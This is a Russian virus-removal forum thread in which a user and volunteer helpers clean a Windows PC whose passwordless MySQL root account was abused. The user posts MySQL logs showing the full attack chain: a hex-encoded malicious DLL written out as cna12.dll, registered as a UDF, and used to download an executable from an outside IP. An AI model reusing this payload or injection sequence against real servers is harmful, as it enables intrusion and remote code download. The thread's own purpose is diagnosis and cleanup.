Вирусы, падают программы. [Backdoor.Win32.Small.lhd ]

[Vvvyg]

Скрипт Комбофикс не удалил .exe файлы которые были в корне диска C. Я удалил их вручную и сделал копию в запароленом архиве. Если они будут необходимы выложу на файлообменник.

Загрузите по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме. Пароль должен быть virus, формат архива - .zip.
Сделайте новый лог ComboFix.

[Fruty]

Размер архива с .exe файлами - 153 мб. Они загрузятся?

[Vvvyg]

Опа Подождите пока, не уверен.

[Fruty]

Вот сейчас в очередной раз аваст вновь заблокировал mysqld.exe и тут до меня дошло (как я раньше не додумался ) посмотреть логи самого mysql. Вот что обнаружил в логах при последнем проявления активности зловереда (жаль что сервер перезапускал и старые логи стерты)

Код:

W:\modules\database\MySQL-5.6.14\bin\mysqld.exe, Version: 5.6.14-log (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: (null)
Time                 Id Command    Argument
131017 22:38:33	    2 Connect	[email protected] on mysql
131017 22:38:34	    2 Query	set autocommit=0
131017 22:38:35	    2 Quit	
131017 22:38:36	    3 Connect	[email protected] on mysql
		    3 Query	set autocommit=0
		    3 Query	SELECT VERSION()
131017 22:38:37	    3 Query	set @a = concat('',0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000EF55A8C1AB34C692AB34C692AB34C692C42BCC92AF34C692C42BC292A934C692AB34C692A834C692AB34C792B834C692C92BD592AC34C6929D12CD92A934C6925414C292AA34C69252696368AB34C692000000000000000000000000000000000000000000000000504500004C0103000E6DFF4F0000000000000000E0000E210B01060000100000001000000050000020660000006000000070000000000010001000000002000004000000000000000400000000000000008000000010000000000000020000000000100000100000000010000010000000000000100000006C71000070000000007000006C010000000000000000000000000000000000000000000000000000DC7100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000500000001000000000000000040000000000000000000000000000800000E0555058310000000000100000006000000008000000040000000000000000000000000000400000E05550583200000000001000000070000000020000000C0000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303400555058210D0902081292E561117752FFF14200001406000000500000260100C02F775FFE8B4C2408B801003BC8750A0C04890D21D8C2FCF676EC0C0090008B4412C7400813100432C0C3EE6FDFBE81EC34020C5355568D1810575033F6682E6E77FBDD906813808974241CC71528044DFF15315DB7BDFD0085C075208D531C8D542B515C183428D8EDD8EF52505633845123048B1B14520ADC5DFBEE08B9660033C08D7C244B20F3AB2ED375DDFF3F2850516A01565A383774073C5BB77B4D5C44B80750007FE80C03FB7BEBBA524D2835182F506A03663C568912768FFD6F2C1B4C8BAC244C0260942440398B1DFFFF7FEF74108B4D0827208B790483C9FFF2AEF7D12BF98BC18BF78BFA63DFFFFFC1E902F3A58BC883E103F3A4FFD38D8C24AC6D840694DBBB3F7303C01483BC24BC0D0275558B1BB0EEDEFD3783E804743E48740E48F6487543BF5D14EB41FF5E83E91CB4120B17150CEB2B83EFDDCFD8F802250704EB1B0620FCEB1413D6DC217F0AF0EB09E89DBA9F58B0367B6A00A107A3C1ED6B77B1A8CE8B115218F1586CEF164CF70F85D500E93513062620A8FFD6CAC9EDDD8B3D0E1C68102715FFD7886CD662C10F4AEE1406EFFFB16F840470EC3C8BF083C40885F674165614C2DBD8916C38560634190C8DBC599F139E2CAA83C177E6308BB4E11BB608802704D44889460C5154FBD8EF83C352514D40502A2C8B7E0C40750BDB162714438BAB54335F7FFCD6B84B49899F325E5D5B81C482C38B45DE2C65BB08268B386965703E4343C0691752186710422E994084080B3F256C90000F8B400C5974EB4ED8B30846405921FF25134C05B8A11B1948543108F50E39052FECBE6F59DC7E2EFF0D078B051024FE018B09CB21FD4871E0753F6880383059BEF7B7BBA314E875049EEB66832000A10DBC041FBBE1FB04001CE4E204A6FF555959EB3D6AAF8B756339269B305E21E3D8FF5FA471FC3BF072128B0E85C97407FFD11E83EE672DFD1D6CEABB83251100595E2F5885FFDF30F2C1EC538B5D08568B750C578B7D10E76DB4FFF77509833D5F00EB2683FE01740504E62287E97EF364EC09575653FFD0080C6FDDFDFBDC5E82B04E0FA3FBFFFF3389450CDF60ADAE4C17372B23F64603BBDD0ED8752634032125837D7F74115BFBD6450E083C8B025F5E5B5D9C88223B824D280000DF2E7FA877726F6E672E6F6B0328257329DBCBF6FF20706F72746E756D626572200F646F73760A7304D8FBB66925201E002728FFFFADB9002B03633A5C57696E646F77735C76332E6C6F6BBFE4BB6717612B62004374656D70040384BD6F7F3230395C6D61142E657865371F9574FFFE6973657475701A202D6F223D77DAB7EDDB221A70616263057963556E6B6E1E6CF7DEDE07546F6F2F6C64218F50585007EE6F83FC32303033302368652D6E65770BF7BF05B2387737410064006D0069006E03AFB9AE7D7300740072C9056F070D006EEC7FB2611F6C0076003100320033177013A4E1CC6D2365252750394EFDFF0B4159595354454D5C43757272656E74436FED60DBB60372AE53735C0A5C5425FE19B6B76D90616C201472609D5374617400B4BF1967A15244502D5463A4C8561484230CB2398A0AB01010806DF9FF0144656C65746546696C6541470A566DBBDD91BC45780E57690765630853FB9F66BB1D657034BD0052656743726561376BDF8E7D4B6579410E5175377956616C063969B6F717206C6F731F36CA24E0CDFDFF5F61646A7573745F666469760D5D697474DB6E6F0DD60A7370720C7466086D41F7EEED5A367066633D077075747306D36C9B796F70656E73654ED548B5B16FDB4EAD5524724164640B4C386B0276BF3D47726F7570114D6557732D5BFB9F66E25455524C446F776E578454FDFF63B36FEF00172F171D070B260827200839251610FFFFFFBF0A0B212007080E0E070705060F06071D24073F2207471406060E08060B0DEDFFAD6D180500060A150C0622125C1C005045416F8351FF4C0104000E6DFF4F43E00D210B019C7D7684062A0030130D14000F20969D278F10001004000717A40BD650272A02029AEDD9B207067022076E5CF2818CEA4F78DC4000008406922E40575C2E5BF67417B87874B8B0100342CFB6F121602E72642661CCDE2062876C0903A2402E26940CD2DC27F001303036D91CDBC04F652010BC27657353724042043E210000B8870AE5480412000000FF000000000000000000000000807C2408010F85B901000060BE006000108DBE00B0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9070000008A07472CE83C0177F7803F0175F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE004000008B0709C0743C8B5F048D84300060000001F35083C708FF9678600000958A074708C074DC89F95748F2AE55FF967C60000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE806000008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E924ACFFFF0000000000000000000000000000000000000000000000000000000000000000000000B070000078700000000000000000000000000000BD70000090700000000000000000000000000000CA70000098700000000000000000000000000000D5700000A0700000000000000000000000000000E2700000A87000000000000000000000000000000000000000000000EC700000FA7000000A7100001A7100002871000000000000367100000000000044710000000000004A7100000000000056710000000000004B45524E454C33322E444C4C0041445641504933322E646C6C004D53564352542E646C6C004E455441504933322E646C6C0075726C6D6F6E2E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C46726565000000526567436C6F73654B65790000006672656500004E657455736572416464000055524C446F776E6C6F6164546F46696C65410000000000000E6DFF4F00000000B271000001000000030000000300000094710000A0710000AC710000301000003013000020100000BC710000C2710000CF7100000000010002006D7973716C2E646C6C007870646C33007870646C335F6465696E6974007870646C335F696E6974000000006000000C0000002D360000000000000000000000000000000000000000000000000000)
		    3 Query	use mysql
		    3 Query	drop table IF EXISTS yongger2
131017 22:38:38	    3 Query	SHOW WARNINGS
		    3 Query	create table yongger2(data LONGBLOB)
131017 22:38:39	    3 Query	insert into yongger2 values("")
		    3 Query	update yongger2 set data = @a
		    3 Query	set @dir2 = concat('select data from yongger2 into DUMPFILE "',@@plugin_dir,'\\cna12.dll"')
131017 22:38:40	    3 Query	set @dir2 = replace(@dir2,'\\','\\\\')
		    3 Query	set @dir2 = replace(@dir2,"/","\\\\")
131017 22:38:41	    3 Query	prepare sql3 from @dir2
		    3 Prepare	select data from yongger2 into DUMPFILE "W:\\modules\\database\\MySQL-5.6.14\\lib\\plugin\\\\cna12.dll"
		    3 Query	execute sql3
		    3 Query	select data from yongger2 into DUMPFILE '..\\bin\\cna12.dll'
131017 22:38:42	    3 Query	drop table IF EXISTS yongger2
		    3 Query	drop FUNCTION xpdl3
131017 22:38:43	    3 Query	CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
131017 22:38:44	    3 Query	select xpdl3('http://192.210.54.61:280/360sb.exe','c:\\isetup.exe')

Как я понимаю он создает таблицу в базе данных, в неё запихивает код, который потом инпортирует в файл cna12.dll, а сам код наверное содержится в строке 0x4D5A900003000....
Потом создает функцию, которая используя cna12.dll удаленно загружает файлы на компьютер.
Я так понимаю cna12.dll следует засунуть в zip-архив, установить пароль virus и загрузить по красной ссылке?

- - - Добавлено - - -

Размер архива с .exe файлами - 153 мб. Они загрузятся?

Опа Подождите пока, не уверен.

Не загрузилось походу. Загрузка шла-шла, потом просто выбило форму загрузки без каких либо сообщений об ошибках или успешной загрузке.

[Vvvyg]

Как я понимаю он создает базу данных в неё запихивает код, который потом инпортирует в файл cna12.dll
Потом создает функцию, которая используя cna12.dll удаленно загружает файлы на компьютер.
Я так понимаю cna12.dll следует засунуть в zip-архив, установить пароль virus и загрузить по красной ссылке?

Давайте.
А те файлы из корня смысла нет грузить, скорее всего, это дистрибутивы софта, которы вам устанавливали китайские братья. Не удаляйте, возможно thyrex по-другому распорядится.

[Fruty]

Подключался он пользователем root (который был без пароля ) c хоста 192.210.54.61
Изменил пароли всем пользователям mysql. Теперь он вряд ли сможет обратится к mysqld.exe
Сейчас сделаю лог комбофикс.

- - - Добавлено - - -

Загрузил cna12.dll
Результат загрузки
Файл сохранён как 131017_201645_virus_526045ad8c552.zip
Размер файла 2637
MD5 93536da204240579dfa0e0be4ac26e04

[Vvvyg]

Спасибо, кака известная.

[thyrex]

Не удаляйте, возможно thyrex по-другому распорядится.

Удаляйте

[Fruty]

Прикрепляю лог Combofix

[Vvvyg]

Загрузите в карантин ещё файл

Код:

c:\windows\is-33GHD.exe

И посмотрите, что это такое:

Код:

c:\windows\qpthqliksq

Скорее всего, можно смело удалить.

Удалите ComboFix.

Выполните скрипт в AVZ при наличии доступа в интернет:

Код:

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к броузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.

[Fruty]

Возле файла is-33GHD.exe были так же файлы is-33GHD.lst и is-33GHD.msg. Их так же добавил в архив. Проверил на virustotal - по всем трем ни одного срабатывания, все ок.

Результат загрузки
Файл сохранён как 131018_072000_is-33GDH_5260e120721f4.zip
Размер файла 538480
MD5 be4701ddc21d42e82eb4dd2bade0a6aa

c:\windows\qpthqliksq

что это понять не могу, в текстовом редакторе при открыии - как при открытии dll - одни иероглифы. Только в самом низу можно сквозь строки увидеть "Internal name КАКОЕ_ТО_ИМЯ.exe. Microsoft Corporation". Можно удалять?

При открытии контекстного меню в проводнике осталось "Rising Antivirus". Через CCleaner посмотрел, элемент ссылается на файл C:\Windows\System32\ravext.dll, в описании которого "Rising Shell Ext Module". Я могу его удалить?

Еще, извините за некомпетентность в данном вопросе, хотел бы понять (если вопрос глупый - можете просто проигнорировать).
Получается, как такового зловреда не было что-ли? Он просто подключался удаленно ко мне и тогда уже выполнялись какие-то операции. Тогда не могу понять, откуда он знал, как ко мне подключится, ведь ip у меня динамический, и как я понимаю для этого явно нужно что-то, чтобы информировало его, как ко мне подключится.
Откуда-то он ведь узнавал, как ко мне подключится, чтобы загрузить на компьютер cna12.dll

- - - Добавлено - - -

Скрипт AVZ выполнил, найдено была уязвимость в java, обновил. Повторил скрипт - уязвимости не найдены.

[Vvvyg]

Удаляйте is-33GHD.* и qpthqliksq.
Что касается Rising Antivirus - попробуем его корректно вычистить.
Сделайте полный образ автозапуска uVS, только программу скачайте отсюда.

Ваш адрес просто попался при сканировании портов, подложить личинку успели, а дальше бэкдор уже сам наружу вылезал.

[CyberHelper]

Статистика проведенного лечения:

• Получено карантинов: 4
• Обработано файлов: 22
• В ходе лечения обнаружены вредоносные программы:
  
  1. \\cna12.dll - Backdoor.Win32.Small.lhd ( DrWEB: BackDoor.Siggen.53556, BitDefender: Backdoor.Generic.757546 )
  2. c:\\windows\\system32\\winhelp32.exe - Backdoor.Win32.Yoddos.ple ( BitDefender: Gen:Variant.Graftor.30810 )
  3. c:\\windows\\temp\\isetup.exe - HEUR:Trojan.Win32.Generic ( BitDefender: Dropped:Generic.Malware.SFdld.00DD502D )